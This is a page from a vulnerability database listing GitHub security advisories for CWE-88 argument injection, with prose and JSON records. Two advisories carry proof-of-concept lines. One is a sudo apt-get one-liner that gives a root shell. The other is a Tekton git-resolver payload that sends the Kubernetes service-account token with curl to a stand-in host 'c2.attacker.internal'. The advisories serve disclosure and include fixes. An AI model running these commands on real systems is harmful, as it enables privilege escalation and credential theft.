CWE-88
AllowedImproper Neutralization of Argument Delimiters in a Command ('Argument Injection')
Abstraction: Base · Status: Draft
The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.
550 vulnerabilities reference this CWE, most recent first.
GHSA-8QF9-3V8P-QXX6
Vulnerability from github – Published: 2025-06-08 21:30 – Updated: 2025-06-08 21:30Products that incorporate the Microhard BulletLTE-NA2 and IPn4Gii-NA2 are vulnerable to a post-authentication command injection issue in the AT+MMNAME command that can lead to privilege escalation. This is an instance of CWE-88, "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS 7.1 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). This issue has not been generally fixed at the time of this CVE record's first publishing.
{
"affected": [],
"aliases": [
"CVE-2025-35008"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-08T21:15:32Z",
"severity": "HIGH"
},
"details": "Products that incorporate the Microhard BulletLTE-NA2 and IPn4Gii-NA2 are vulnerable to a post-authentication command injection issue in the AT+MMNAME command that can lead to privilege escalation. This is an instance of CWE-88,\u00a0\"Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027),\" and is estimated as a CVSS 7.1 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). This issue has not been generally fixed at the time of this CVE record\u0027s first publishing.",
"id": "GHSA-8qf9-3v8p-qxx6",
"modified": "2025-06-08T21:30:30Z",
"published": "2025-06-08T21:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-35008"
},
{
"type": "WEB",
"url": "https://support.microhardcorp.com/portal/en/kb/articles/ipn4gii-bullet-lte-firmware"
},
{
"type": "WEB",
"url": "https://takeonme.org/cves/cve-2025-35008"
},
{
"type": "WEB",
"url": "https://www.microhardcorp.com/BulletLTE-NA2.php"
},
{
"type": "WEB",
"url": "https://www.microhardcorp.com/IPn4Gii-NA2.php"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8VJW-56WR-77JM
Vulnerability from github – Published: 2022-05-14 01:54 – Updated: 2022-05-14 01:54kernel/omap/drivers/misc/gcx/gcioctl/gcif.c in the kernel component in Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3 allows attackers to inject a crafted argument via the argument of an ioctl on device /dev/gcioctl with the command 3224132973 and cause a kernel crash.
{
"affected": [],
"aliases": [
"CVE-2018-11022"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-10-16T22:29:00Z",
"severity": "HIGH"
},
"details": "kernel/omap/drivers/misc/gcx/gcioctl/gcif.c in the kernel component in Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3 allows attackers to inject a crafted argument via the argument of an ioctl on device /dev/gcioctl with the command 3224132973 and cause a kernel crash.",
"id": "GHSA-8vjw-56wr-77jm",
"modified": "2022-05-14T01:54:10Z",
"published": "2022-05-14T01:54:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11022"
},
{
"type": "WEB",
"url": "https://github.com/datadancer/HIAFuzz/blob/master/CVE-Advisory.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8VV8-Q6F3-9JJG
Vulnerability from github – Published: 2022-08-18 00:00 – Updated: 2022-08-19 00:00An Argument Injection or Modification vulnerability in the "Change Secret" username field as used in the Discovery component of Device42 CMDB allows a local attacker to run arbitrary code on the appliance with root privileges. This issue affects: Device42 CMDB version 18.01.00 and prior versions.
{
"affected": [],
"aliases": [
"CVE-2022-1399"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-17T00:15:00Z",
"severity": "CRITICAL"
},
"details": "An Argument Injection or Modification vulnerability in the \"Change Secret\" username field as used in the Discovery component of Device42 CMDB allows a local attacker to run arbitrary code on the appliance with root privileges. This issue affects: Device42 CMDB version 18.01.00 and prior versions.",
"id": "GHSA-8vv8-q6f3-9jjg",
"modified": "2022-08-19T00:00:20Z",
"published": "2022-08-18T00:00:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1399"
},
{
"type": "WEB",
"url": "https://www.bitdefender.com/blog/labs/a-red-team-perspective-on-the-device42-asset-management-appliance"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8W6W-23MQ-H8RG
Vulnerability from github – Published: 2026-07-02 20:23 – Updated: 2026-07-02 20:23Summary
In the Debian.sudoers file, apt-get is allowed for the nagios user. The full command including the arguments are not enforced and can therefore be choosen arbitrarily. This allows to easily get a root shell as the nagios user:
PoC
By choosing a particular argument, you can get (as a nagios user) a root shell:
sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/sh"
Since the nagious user can use sudo to run apt-get as root, the resulting shell is also running as root.
Impact
The vulnerability is a local privilege escalation, impacting users who use the provided sudoers file. It requires that an attacker already compromised the nagios account (which is quite a high barrier to be honest).
Fix
Since only one place where apt-get is currently used (in deb-updates) was found, it should be enough to allow only the specific arguments used there.
Here an example how the line in the sudoers file could look like:
/usr/lib64/nagios/plugins/strongswan-connections,\
/usr/lib64/nagios/plugins/systemd-unit,\
/usr/bin/apt-get update --quiet 2
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.0.0"
},
"package": {
"ecosystem": "PyPI",
"name": "linuxfabrik-lib"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-52817"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-02T20:23:56Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nIn the [Debian.sudoers](https://github.com/Linuxfabrik/monitoring-plugins/blob/main/assets/sudoers/Debian.sudoers) file, `apt-get` is allowed for the nagios user. The full command including the arguments are not enforced and can therefore be choosen arbitrarily. This allows to easily get a root shell as the nagios user:\n\n### PoC\nBy choosing a particular argument, you can get (as a nagios user) a root shell:\n```\nsudo apt-get update -o APT::Update::Pre-Invoke::=\"/bin/sh\"\n```\nSince the nagious user can use sudo to run apt-get as root, the resulting shell is also running as root.\n\n### Impact\nThe vulnerability is a local privilege escalation, impacting users who use the provided sudoers file. It requires that an attacker already compromised the nagios account (which is quite a high barrier to be honest).\n\n### Fix\nSince only one place where `apt-get` is currently used (in [deb-updates](https://github.com/Linuxfabrik/monitoring-plugins/blob/998302a5fb43e89df1359f4cbb6558f81c96ae4f/check-plugins/deb-updates/deb-updates#L124)) was found, it should be enough to allow only the specific arguments used there.\n\nHere an example how the line in the sudoers file could look like:\n```\n /usr/lib64/nagios/plugins/strongswan-connections,\\\n /usr/lib64/nagios/plugins/systemd-unit,\\\n /usr/bin/apt-get update --quiet 2\n```",
"id": "GHSA-8w6w-23mq-h8rg",
"modified": "2026-07-02T20:23:56Z",
"published": "2026-07-02T20:23:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Linuxfabrik/monitoring-plugins/security/advisories/GHSA-8w6w-23mq-h8rg"
},
{
"type": "PACKAGE",
"url": "https://github.com/Linuxfabrik/monitoring-plugins"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Linuxfabrik Monitoring Plugins: Sudoers may be able to obtain privilege escalation via /usr/bin/apt-get arguments"
}
GHSA-8WM5-8H9C-47PC
Vulnerability from github – Published: 2022-08-05 00:00 – Updated: 2022-08-11 21:14Apache Hadoop's FileUtil.unTar(File, File) API does not escape the input file name before being passed to the shell. An attacker can inject arbitrary commands. This is only used in Hadoop 3.3 InMemoryAliasMap.completeBootstrapTransfer, which is only ever run by a local user. It has been used in Hadoop 2.x for yarn localization, which does enable remote code execution. It is used in Apache Spark, from the SQL command ADD ARCHIVE. As the ADD ARCHIVE command adds new binaries to the classpath, being able to execute shell scripts does not confer new permissions to the caller. SPARK-38305. "Check existence of file before untarring/zipping", which is included in 3.3.0, 3.1.4, 3.2.2, prevents shell commands being executed, regardless of which version of the hadoop libraries are in use. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.3 or upper (including HADOOP-18136).
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.hadoop:hadoop-common"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.10.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.hadoop:hadoop-common"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-alpha"
},
{
"fixed": "3.2.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.hadoop:hadoop-common"
},
"ranges": [
{
"events": [
{
"introduced": "3.3.0"
},
{
"fixed": "3.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-25168"
],
"database_specific": {
"cwe_ids": [
"CWE-78",
"CWE-88"
],
"github_reviewed": true,
"github_reviewed_at": "2022-08-11T21:14:19Z",
"nvd_published_at": "2022-08-04T15:15:00Z",
"severity": "CRITICAL"
},
"details": "Apache Hadoop\u0027s `FileUtil.unTar(File, File)` API does not escape the input file name before being passed to the shell. An attacker can inject arbitrary commands. This is only used in Hadoop 3.3 InMemoryAliasMap.completeBootstrapTransfer, which is only ever run by a local user. It has been used in Hadoop 2.x for yarn localization, which does enable remote code execution. It is used in Apache Spark, from the SQL command ADD ARCHIVE. As the ADD ARCHIVE command adds new binaries to the classpath, being able to execute shell scripts does not confer new permissions to the caller. SPARK-38305. \"Check existence of file before untarring/zipping\", which is included in 3.3.0, 3.1.4, 3.2.2, prevents shell commands being executed, regardless of which version of the hadoop libraries are in use. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.3 or upper (including HADOOP-18136).",
"id": "GHSA-8wm5-8h9c-47pc",
"modified": "2022-08-11T21:14:19Z",
"published": "2022-08-05T00:00:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25168"
},
{
"type": "WEB",
"url": "https://github.com/apache/hadoop/commit/cae749b076f35f0be13a926ee8cfbb7ce4402746"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/hadoop"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/mxqnb39jfrwgs3j6phwvlrfq4mlox130"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220915-0007"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache Hadoop argument injection vulnerability"
}
GHSA-8WRC-9XQR-5PH9
Vulnerability from github – Published: 2022-09-22 00:00 – Updated: 2022-09-23 00:00Ahsay AhsayCBS 9.1.4.0 allows an authenticated system user to inject arbitrary Java JVM options. Administrators that can modify the Runtime Options in the web interface can inject Java Runtime Options. These take effect after a restart. For example, an attacker can enable JMX services and consequently achieve remote code execution as the system user.
{
"affected": [],
"aliases": [
"CVE-2022-37027"
],
"database_specific": {
"cwe_ids": [
"CWE-74",
"CWE-88"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-09-21T17:15:00Z",
"severity": "HIGH"
},
"details": "Ahsay AhsayCBS 9.1.4.0 allows an authenticated system user to inject arbitrary Java JVM options. Administrators that can modify the Runtime Options in the web interface can inject Java Runtime Options. These take effect after a restart. For example, an attacker can enable JMX services and consequently achieve remote code execution as the system user.",
"id": "GHSA-8wrc-9xqr-5ph9",
"modified": "2022-09-23T00:00:33Z",
"published": "2022-09-22T00:00:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37027"
},
{
"type": "WEB",
"url": "https://wiki.ahsay.com/doku.php?id=public:resources:release_notes_v9320"
},
{
"type": "WEB",
"url": "https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp"
},
{
"type": "WEB",
"url": "https://www.ahsay.com/partners/en/home/index.jsp?pageContentKey=ahsay_assets_latest_hotfix"
},
{
"type": "WEB",
"url": "https://www.compass-security.com/en/research/advisories"
},
{
"type": "WEB",
"url": "https://www.compass-security.com/fileadmin/Research/Advisories/2022_12_CSNC-2022-009_AhsayCBS_Java_Runtime_Parameter_Injection.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8X4F-H4C6-38HM
Vulnerability from github – Published: 2025-07-17 21:32 – Updated: 2025-07-17 21:32An improper validation vulnerability was reported in Lenovo Vantage that under certain conditions could allow a local attacker to execute code with elevated permissions by modifying an application configuration file.
{
"affected": [],
"aliases": [
"CVE-2025-6231"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-17T20:15:31Z",
"severity": "HIGH"
},
"details": "An improper validation vulnerability was reported in Lenovo Vantage that under certain conditions could allow a local attacker to execute code with elevated permissions by modifying an application configuration file.",
"id": "GHSA-8x4f-h4c6-38hm",
"modified": "2025-07-17T21:32:16Z",
"published": "2025-07-17T21:32:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6231"
},
{
"type": "WEB",
"url": "https://support.lenovo.com/us/en/product_security/LEN-196648"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-935R-RFCH-9MR7
Vulnerability from github – Published: 2026-03-20 21:31 – Updated: 2026-07-14 15:31Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.
{
"affected": [],
"aliases": [
"CVE-2026-4438"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-88"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-20T20:16:49Z",
"severity": "MODERATE"
},
"details": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library\u0027s DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.",
"id": "GHSA-935r-rfch-9mr7",
"modified": "2026-07-14T15:31:40Z",
"published": "2026-03-20T21:31:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4438"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
},
{
"type": "WEB",
"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34015"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-94JR-7PQP-XHCQ
Vulnerability from github – Published: 2026-04-21 20:28 – Updated: 2026-05-21 22:40Summary
The git resolver's revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=<binary>. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration.
Details
Root Cause 1 — Unvalidated revision parameter passed to git fetch
pkg/resolution/resolver/git/repository.go:85:
// pkg/resolution/resolver/git/repository.go lines 84-96
// 'revision' is the raw user-supplied string from the ResolutionRequest param.
// It is passed verbatim as a positional argument to git fetch:
func (repo *repository) checkout(ctx context.Context, revision string) error {
_, err := repo.execGit(ctx, "fetch", "origin", revision, "--depth=1")
// When revision == "--upload-pack=/usr/bin/curl", git parses it as the
// --upload-pack flag, not as a refspec — executing the binary locally.
if err != nil {
return fmt.Errorf("fetch: %w", err)
}
_, err = repo.execGit(ctx, "checkout", "FETCH_HEAD")
return err
}
execGit invokes exec.CommandContext("git", ...) — no shell is used, so shell metacharacters cannot be injected. However, git itself parses flags from mixed positional arguments. When revision = "--upload-pack=/path/to/binary", git receives this as the flag --upload-pack=/path/to/binary, not as a refspec. PopulateDefaultParams (resolver.go:418–424) applies only a leading-slash strip and a containsDotDot check on the pathInRepo parameter; the revision parameter receives no validation at all.
Root Cause 2 — validateRepoURL explicitly permits local filesystem paths
pkg/resolution/resolver/git/resolver.go:154-158:
// validateRepoURL validates if the given URL is a valid git, http, https URL or
// starting with a / (a local repository).
func validateRepoURL(url string) bool {
pattern := `^(/|[^@]+@[^:]+|(git|https?)://)`
re := regexp.MustCompile(pattern)
return re.MatchString(url)
}
Any URL beginning with / passes validation and is used directly as the argument to git clone. This means a local filesystem path such as /tmp/some-repo is a valid resolver URL.
Exploit Chain
--upload-pack=<binary> causes git to execute the specified binary as the upload-pack server when communicating with the remote. For local-path remotes (/path), git invokes the binary on the resolver pod itself with the repository path as its sole argument. Because the argument is passed via exec.Command as a single --upload-pack=<binary> string (not split by a shell), only binaries at known paths can be invoked — but several useful binaries exist in the resolver pod image (e.g., /bin/sh, /usr/bin/curl, /bin/cp).
Attack complexity is High because the exploit requires either:
- A valid git repository at a known, predicable path on the resolver pod (e.g., /tmp/<reponame>-<suffix> from a concurrent resolution), or
- A default-URL configuration pointing at a local path
PoC
# Step 1: Set up a local git repository to serve as the "origin"
# (in a real attack, the attacker would time this against a concurrent clone
# or use any pre-existing git repo path on the resolver pod)
git init /tmp/localrepo && cd /tmp/localrepo && git commit --allow-empty -m "init"
# Step 2: Craft a ResolutionRequest with injected --upload-pack flag
kubectl create -f - <<'EOF'
apiVersion: resolution.tekton.dev/v1beta1
kind: ResolutionRequest
metadata:
name: revision-injection-poc
namespace: default
labels:
resolution.tekton.dev/type: git
spec:
params:
- name: url
value: /tmp/localrepo
- name: revision
value: "--upload-pack=/usr/bin/curl http://c2.attacker.internal/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 -w0)"
- name: pathInRepo
value: README.md
EOF
# The resolver pod executes:
# git -C <tmpdir> fetch origin \
# "--upload-pack=/usr/bin/curl http://c2.attacker.internal/..." \
# --depth=1
#
# For single-argument binaries (/bin/sh, /usr/bin/env, etc.):
# git -C <tmpdir> fetch origin "--upload-pack=/bin/sh" --depth=1
# Executes /bin/sh with the local repository path as argv[1].
# From /bin/sh, the attacker can use a pre-staged script (e.g., written
# via a workspace volume) to achieve arbitrary command execution.
Verified: git fetch origin --upload-pack=/tmp/test-exec.sh --depth=1 executes test-exec.sh on the local machine even when origin is a local filesystem path. Exit code 0 was observed with the test binary executed successfully.
Impact
- Code execution on the resolver pod when an attacker can stage or predict a valid git repository path in
/tmpon the resolver pod. - Full cluster-wide Secret exfiltration: The
tekton-pipelines-resolversServiceAccount is bound to a ClusterRole that grantsget/list/watchon all Secrets in all namespaces (config/resolvers/200-clusterrole.yaml). Code execution on the resolver pod is therefore equivalent to reading every Secret in the cluster. - Privilege escalation: Secrets typically include kubeconfig files, cloud provider credentials, and API tokens — reading them enables lateral movement to cloud infrastructure.
- Both the deprecated resolver (
pkg/resolution/resolver/git/) and the current resolver (pkg/remoteresolution/resolver/git/) share the samevalidateRepoURL,PopulateDefaultParams, andcheckoutimplementation via the sharedgitpackage. Both are affected.
Recommended Fix
Fix 1 — Validate that revision does not begin with - in PopulateDefaultParams:
if strings.HasPrefix(paramsMap[RevisionParam], "-") {
return nil, fmt.Errorf("invalid revision %q: must not begin with '-'", paramsMap[RevisionParam])
}
Fix 2 — Restrict validateRepoURL to remote URLs only (remove local-path support in production builds, or add an explicit admin opt-in feature flag):
func validateRepoURL(url string) bool {
pattern := `^([^@]+@[^:]+|(git|https?)://)`
re := regexp.MustCompile(pattern)
return re.MatchString(url)
}
Applying Fix 1 alone is sufficient to prevent the argument injection. Fix 2 eliminates the enabling condition (local-path remotes for which --upload-pack runs locally) and reduces attack surface further.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.10.0"
},
{
"fixed": "1.11.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.0"
},
{
"fixed": "1.9.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.6.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "1.3.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/tektoncd/pipeline"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40938"
],
"database_specific": {
"cwe_ids": [
"CWE-88"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T20:28:36Z",
"nvd_published_at": "2026-04-21T21:16:46Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe git resolver\u0027s `revision` parameter is passed directly as a positional argument to `git fetch` without any validation that it does not begin with a `-` character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary `git fetch` flags such as `--upload-pack=\u003cbinary\u003e`. Combined with the `validateRepoURL` function explicitly permitting URLs that begin with `/` (local filesystem paths), a tenant who can submit `ResolutionRequest` objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The `tekton-pipelines-resolvers` ServiceAccount holds cluster-wide `get/list/watch` on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration.\n\n## Details\n\n### Root Cause 1 \u2014 Unvalidated `revision` parameter passed to `git fetch`\n\n`pkg/resolution/resolver/git/repository.go:85`:\n\n```go\n// pkg/resolution/resolver/git/repository.go lines 84-96\n// \u0027revision\u0027 is the raw user-supplied string from the ResolutionRequest param.\n// It is passed verbatim as a positional argument to git fetch:\nfunc (repo *repository) checkout(ctx context.Context, revision string) error {\n _, err := repo.execGit(ctx, \"fetch\", \"origin\", revision, \"--depth=1\")\n // When revision == \"--upload-pack=/usr/bin/curl\", git parses it as the\n // --upload-pack flag, not as a refspec \u2014 executing the binary locally.\n if err != nil {\n return fmt.Errorf(\"fetch: %w\", err)\n }\n _, err = repo.execGit(ctx, \"checkout\", \"FETCH_HEAD\")\n return err\n}\n```\n\n`execGit` invokes `exec.CommandContext(\"git\", ...)` \u2014 no shell is used, so shell metacharacters cannot be injected. However, git itself parses flags from mixed positional arguments. When `revision = \"--upload-pack=/path/to/binary\"`, git receives this as the flag `--upload-pack=/path/to/binary`, not as a refspec. `PopulateDefaultParams` (`resolver.go:418\u2013424`) applies only a leading-slash strip and a `containsDotDot` check on the `pathInRepo` parameter; the `revision` parameter receives no validation at all.\n\n### Root Cause 2 \u2014 `validateRepoURL` explicitly permits local filesystem paths\n\n`pkg/resolution/resolver/git/resolver.go:154-158`:\n\n```go\n// validateRepoURL validates if the given URL is a valid git, http, https URL or\n// starting with a / (a local repository).\nfunc validateRepoURL(url string) bool {\n pattern := `^(/|[^@]+@[^:]+|(git|https?)://)`\n re := regexp.MustCompile(pattern)\n return re.MatchString(url)\n}\n```\n\nAny URL beginning with `/` passes validation and is used directly as the argument to `git clone`. This means a local filesystem path such as `/tmp/some-repo` is a valid resolver URL.\n\n### Exploit Chain\n\n`--upload-pack=\u003cbinary\u003e` causes git to execute the specified binary as the upload-pack server when communicating with the remote. For local-path remotes (`/path`), git invokes the binary on the resolver pod itself with the repository path as its sole argument. Because the argument is passed via `exec.Command` as a single `--upload-pack=\u003cbinary\u003e` string (not split by a shell), only binaries at known paths can be invoked \u2014 but several useful binaries exist in the resolver pod image (e.g., `/bin/sh`, `/usr/bin/curl`, `/bin/cp`).\n\nAttack complexity is High because the exploit requires either:\n- A valid git repository at a known, predicable path on the resolver pod (e.g., `/tmp/\u003creponame\u003e-\u003csuffix\u003e` from a concurrent resolution), or\n- A default-URL configuration pointing at a local path\n\n## PoC\n\n```bash\n# Step 1: Set up a local git repository to serve as the \"origin\"\n# (in a real attack, the attacker would time this against a concurrent clone\n# or use any pre-existing git repo path on the resolver pod)\ngit init /tmp/localrepo \u0026\u0026 cd /tmp/localrepo \u0026\u0026 git commit --allow-empty -m \"init\"\n\n# Step 2: Craft a ResolutionRequest with injected --upload-pack flag\nkubectl create -f - \u003c\u003c\u0027EOF\u0027\napiVersion: resolution.tekton.dev/v1beta1\nkind: ResolutionRequest\nmetadata:\n name: revision-injection-poc\n namespace: default\n labels:\n resolution.tekton.dev/type: git\nspec:\n params:\n - name: url\n value: /tmp/localrepo\n - name: revision\n value: \"--upload-pack=/usr/bin/curl http://c2.attacker.internal/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 -w0)\"\n - name: pathInRepo\n value: README.md\nEOF\n\n# The resolver pod executes:\n# git -C \u003ctmpdir\u003e fetch origin \\\n# \"--upload-pack=/usr/bin/curl http://c2.attacker.internal/...\" \\\n# --depth=1\n#\n# For single-argument binaries (/bin/sh, /usr/bin/env, etc.):\n# git -C \u003ctmpdir\u003e fetch origin \"--upload-pack=/bin/sh\" --depth=1\n# Executes /bin/sh with the local repository path as argv[1].\n# From /bin/sh, the attacker can use a pre-staged script (e.g., written\n# via a workspace volume) to achieve arbitrary command execution.\n```\n\n**Verified**: `git fetch origin --upload-pack=/tmp/test-exec.sh --depth=1` executes `test-exec.sh` on the local machine even when `origin` is a local filesystem path. Exit code 0 was observed with the test binary executed successfully.\n\n## Impact\n\n- **Code execution on the resolver pod** when an attacker can stage or predict a valid git repository path in `/tmp` on the resolver pod.\n- **Full cluster-wide Secret exfiltration**: The `tekton-pipelines-resolvers` ServiceAccount is bound to a ClusterRole that grants `get/list/watch` on all Secrets in all namespaces (`config/resolvers/200-clusterrole.yaml`). Code execution on the resolver pod is therefore equivalent to reading every Secret in the cluster.\n- **Privilege escalation**: Secrets typically include kubeconfig files, cloud provider credentials, and API tokens \u2014 reading them enables lateral movement to cloud infrastructure.\n- Both the deprecated resolver (`pkg/resolution/resolver/git/`) and the current resolver (`pkg/remoteresolution/resolver/git/`) share the same `validateRepoURL`, `PopulateDefaultParams`, and `checkout` implementation via the shared `git` package. Both are affected.\n\n## Recommended Fix\n\n**Fix 1 \u2014 Validate that `revision` does not begin with `-`** in `PopulateDefaultParams`:\n\n```go\nif strings.HasPrefix(paramsMap[RevisionParam], \"-\") {\n return nil, fmt.Errorf(\"invalid revision %q: must not begin with \u0027-\u0027\", paramsMap[RevisionParam])\n}\n```\n\n**Fix 2 \u2014 Restrict `validateRepoURL` to remote URLs only** (remove local-path support in production builds, or add an explicit admin opt-in feature flag):\n\n```go\nfunc validateRepoURL(url string) bool {\n pattern := `^([^@]+@[^:]+|(git|https?)://)`\n re := regexp.MustCompile(pattern)\n return re.MatchString(url)\n}\n```\n\nApplying Fix 1 alone is sufficient to prevent the argument injection. Fix 2 eliminates the enabling condition (local-path remotes for which `--upload-pack` runs locally) and reduces attack surface further.",
"id": "GHSA-94jr-7pqp-xhcq",
"modified": "2026-05-21T22:40:09Z",
"published": "2026-04-21T20:28:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40938"
},
{
"type": "PACKAGE",
"url": "https://github.com/tektoncd/pipeline"
},
{
"type": "WEB",
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Tekton Pipeline: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE"
}
GHSA-94M6-39R7-R5V7
